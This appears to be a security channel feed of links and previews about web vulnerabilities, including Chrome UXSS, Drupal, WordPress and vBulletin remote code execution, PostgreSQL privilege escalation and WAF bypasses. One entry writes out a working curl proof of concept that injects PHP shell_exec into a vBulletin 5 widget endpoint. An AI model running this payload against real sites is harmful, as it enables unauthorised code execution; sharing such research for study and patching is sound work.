Chrome < 62 UXSS (CVE-2017-5124)
https://bo0om.ru/chrome_poc/PoC.php
https://github.com/Bo0oM/CVE-2017-5124 #web #chrome
https://bo0om.ru/chrome_poc/PoC.php
https://github.com/Bo0oM/CVE-2017-5124 #web #chrome
GitHub
GitHub - Bo0oM/CVE-2017-5124: Chrome < 62 uxss exploit (CVE-2017-5124)
Chrome < 62 uxss exploit (CVE-2017-5124). Contribute to Bo0oM/CVE-2017-5124 development by creating an account on GitHub.
Uncovering Drupalgeddon 2. Details about of the vulnerability (CVE-2018-7600) https://research.checkpoint.com/uncovering-drupalgeddon-2/ #web #drupal #rce #darw1n
Check Point Research
Uncovering Drupalgeddon 2 - Check Point Research
Research By: Eyal Shalev, Rotem Reiss and Eran Vaknin Abstract Two weeks ago, a highly critical (25/25 NIST rank) vulnerability, nicknamed Drupalgeddon 2 (SA-CORE-2018-002 / CVE-2018-7600), was disclosed by the Drupal security team. This vulnerability allowed…
Повышение привелегий в PostgreSQL (разбор CVE-2018-10915)
https://habr.com/ru/post/440394/
#web #cve #postgresql
https://habr.com/ru/post/440394/
#web #cve #postgresql
Хабр
Повышение привилегий в PostgreSQL — разбор CVE-2018-10915
Не секрет, что стейт-машины среди нас. Они буквально повсюду, от UI до сетевого стека. Иногда сложные, иногда простые. Иногда security-related, иногда не очень. Но, зачастую, довольно увлекательны...
WordPress 5.0.0 Remote Code Execution
https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ #web #wordpress #rce
https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ #web #wordpress #rce
(CVE-2019-6340) Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution https://www.ambionics.io/blog/drupal8-rce POC: https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88 #web #drupal #rce #poc
Ambionics
Exploiting Drupal8's REST RCE
Exploitation and mitigation bypasses for the new Drupal 8 RCE (SA-CORE-2019-003, CVE-2019-6340), targeting the REST module.
PHP Security Check List
https://github.com/ismailtasdelen/php-security-check-list
#web #pentest #checklist #darw1n
https://github.com/ismailtasdelen/php-security-check-list
#web #pentest #checklist #darw1n
GitHub
GitHub - security-checklist/php-security-check-list: PHP Security Check List [ EN ] 🌋 ☣️
PHP Security Check List [ EN ] 🌋 ☣️. Contribute to security-checklist/php-security-check-list development by creating an account on GitHub.
Awesome-WAF: A curated list of awesome web-app firewall (WAF) stuff:
- Fingerprints of almost all known WAFs (80+)
- Popular methods for evasion w/ ex.
- Compiled list of known bypasses for WAFs
- Tools,papers,videos & presentations
https://github.com/0xInfection/Awesome-WAF
#web #pentest #waf #bypass #darw1n
- Fingerprints of almost all known WAFs (80+)
- Popular methods for evasion w/ ex.
- Compiled list of known bypasses for WAFs
- Tools,papers,videos & presentations
https://github.com/0xInfection/Awesome-WAF
#web #pentest #waf #bypass #darw1n
GitHub
GitHub - 0xInfection/Awesome-WAF: Everything about Web Application Firewalls (WAFs) from Security Standpoint! 🔥
Everything about Web Application Firewalls (WAFs) from Security Standpoint! 🔥 - 0xInfection/Awesome-WAF
Burp Suite Pro/Community 2.1 STABLE released http://releases.portswigger.net/2019/06/professional-community-edition-21.html #web #dukeBarman
Burp Suite Release Notes
Professional / Community 2.1
Burp Suite 2.x is now officially out of beta! This is a huge upgrade over 1.7 with a wealth of new capabilities. We encourage anyone still using 1.7 to switch to 2.x. Community Edition users can now e
ZeroNights Hackquest 2019. Results & Writeups
https://habr.com/ru/company/dsec/blog/472416/
#re #web #writeup #darw1n
https://habr.com/ru/company/dsec/blog/472416/
#re #web #writeup #darw1n
Хабр
ZeroNights Hackquest 2019. Results & Writeups
Совсем недавно завершился ежегодный HackQuest, приуроченный к конференции ZeroNights. Как и в прошлые годы, участникам предстояло решить 7 различных заданий — по одному на сутки квеста. Задания,...
A new pre-auth 0day RCE exploit for vBulletin 5:
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#web #expdev #rce #0day #darw1nHow to Bypass Golang SSL Verification
https://www.cyberark.com/resources/threat-research-blog/how-to-bypass-golang-ssl-verification
#golang #ssl #bypass #reverse #web #pentest
https://www.cyberark.com/resources/threat-research-blog/how-to-bypass-golang-ssl-verification
#golang #ssl #bypass #reverse #web #pentest
Cyberark
How to Bypass Golang SSL Verification
Golang applications that use HTTPS requests have a built-in SSL verification feature enabled by default. In our work, we often encounter an application that uses Golang HTTPS requests, and we have...
🤔5👏2